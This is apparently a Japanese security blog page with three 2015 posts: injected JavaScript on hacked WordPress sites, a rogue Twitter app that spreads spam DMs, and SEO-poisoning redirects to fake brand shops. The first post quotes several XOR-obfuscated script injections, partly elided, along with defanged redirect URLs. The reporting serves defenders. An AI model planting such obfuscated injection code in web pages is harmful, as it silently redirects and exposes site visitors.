無題なログ

セキュリティ情報、迷惑メール、フィッシング詐欺、迷惑ソフト削除、Windows の小ネタを書き出している日本語ブログです~ (*^ー^)ノ

タグ:Twitter

WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
 
ブログ作成ツール WordPress を使用してるサイトの改ざん被害のお話が報告されてます。
 
Wordpress header.php var a="'1Aqapkrv'02v{rg injection
https://www.malwareremovalservice.com/wordpress-header-php-var-a1aqapkrv02vrg-injection/
 
The I.T. side of my life: A new WordPress infection: var a="'1Aqapkrv'02v...
http://myitside.blogspot.com/2015/09/a-new-wordpress-infection-var.html
 
Zscaler Research: Compromised WordPress Campaign - Spyware Edition
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spyware.html
 
何かしら WordPress がらみの脆弱性を悪用し、悪意のある第三者が 不正なJavaScriptコード<BODY>タグの直後に挿入するよう仕込んでるみたい。
<body>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2; 【~中略~】 )'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<追記始め>
 
同じ攻撃者による、別の不正なJavaScriptコードの紹介です。 
<body>
<script type="text/javascript">var a = "'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0: 【~中略~】 @'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<head>タグ終端の直前に挿入されるタイプです。
    <!-- ###: -->
    <script>var a = "'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{ 【~中略~】 {rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
    <!-- :### -->
</head>
<追記終わり>
 
JavaScriptコードが処理されると、欧州ラトビアのサーバーにある不審なURLアドレスを裏で読み込みにいきます。
 
https://www.virustotal.com/ja/ip-address/91.226.33.54/information/
 
改ざんされてるブログを閲覧しても変化はない一方で、Google検索経由でブログにアクセスすると広告ページ(2015 年年次訪問者調査)ヘ強制的に飛ばされました。
 
イメージ 5
 
Google検索
 ↓
(改ざんされてるブログ)
 ↓
http //kfc.i.illuminationes[.]com/snitch?default_keyword= ~
http //c11n4.i.teaserguide[.]com/snitch?default_keyword= ~
 ↓
http //c11n4.i.teaserguide[.]com/in/?_BC= ~
 ↓
怪しげな広告ページへ
 
この改ざん被害は、日本語表記の一般サイトでも目にする機会があって、けっこう複数殺られてる感じ?
 
イメージ 1
 
イメージ 2
 
複数の不正なJavaScriptコードが挿入されてるパターンも。
 
イメージ 3
 
イメージ 4
 
改ざんされてるブログをたまたま踏んだ場合にセキュリティソフトが警告するウイルス検出名はこんな感じ。
 
AVG HTML/Framer
BitDefender Trojan.Script.CPY
Kaspersky Trojan-Downloader.JS.Iframe.diq
McAfee JS/Agent.a
Microsoft Trojan:JS/Iframeinject.AE
Sophos Troj/Iframe-NM
関連するブログ記事
リダイレクト改ざんvar a setTimeout(10) default_keyword encodeURIComponent JavaScriptコード ( WEBサイト・CGI )
このエントリーをはてなブックマークに追加

TwitterスパムDM拡散 連携アプリ「Api Date 09-21-2015 jlid 2」 2015年9月
 
不正な連携アプリ経由でのTwitterアカウント乗っ取りで、スパムDMをバラ撒く被害が2015年9月21日に流行してるみたいで。
 
イメージ 1
 
アプリケーションを承認
連携アプリにTwitterアカウントを使ってログインできます。
Api Date 09-21-2015 jlid 2
google.com
 
このアプリケーションは次のことができます。
・タイムラインのツイートを見る。
・フォローしている人を見る、新しくフォローする
・プロフィールを更新する。
・ツイートする
・ダイレクトメッセージを見る。
 
設定画面のアプリケーションタブ からアプリの連携はいつでも解除できます。
 
サードパーティーアプリケーションと連携する/取り消す | Twitterヘルプセンター
https://support.twitter.com/articles/252401
 
URLアドレスの流れ…
 
http://goo.gl/×××
 ↓
http://peacebuzz[.]cf/peacebuzz/index.php?r=aplikasi/buzzSpamRunning/run&id=3&t=17&i=x
 ↓
https://api.twitter.com/oauth/authenticate?oauth_token=lNej7wAAAAAAhquPAAABT-97nFM
 
このエントリーをはてなブックマークに追加

コンピュータエンターテインメント協会がハッキングされブランド通販詐欺サイト誘導
 
一般社団法人コンピュータエンターテインメント協会(CESA)のサーバーがハッキング被害を受けてるというお話が昨日出てました。
 
じょにーさんはTwitterを使っています: "CEDECのサイトに「このサイトは第三者によってハッキングされている可能性があります。」ってGoogleが警告出してたからサイト内検索してみたけど、これ、やられてないかい?"
https://twitter.com/j_k54/status/625912489671135232
 
バッグや腕時計などブランド商品を扱う通販サイトへユーザーを強制的に転送させる誘導ページが、サーバー内で超大量に作成されてしまってるー。 <数万ぐらい
 
イメージ 1
 
イメージ 5
 
Google、Yahoo!など検索結果
 ↓ ユーザーがクリック
踏み台になってる正規サイト (リダイレクター)
 ↓ 強制転送
インチキ詐欺通販サイト
 
転送先の通販サイトはこんな感じで、外見ではもっともらしく見えるけど、実際には個人情報と振り込んだ購入代金を盗んで商品が届かないインチキ詐欺通販サイトです。
 
イメージ 2
 
イメージ 3
 
イメージ 4
 
イメージ 6
 
攻撃者が正規サイトの乗っ取って誘導ページを作成することで、誘導ページが検索結果でより上位に露出されるSEOポイズニングの手口です。
 
イメージ 7
スウェーデン オランダ オーストリア イタリア クロアチア…
乗っ取られた正規サイトたちで溢れかえる
 
『(ブランド名) 激安』とかでググってみると、検索結果にまともなサイトが表示されることはなく、10件ぜんぶインチキ詐欺通販サイトへ誘導となるので、手口としてはすごい有効だと分かります。
このエントリーをはてなブックマークに追加

↑このページのトップヘ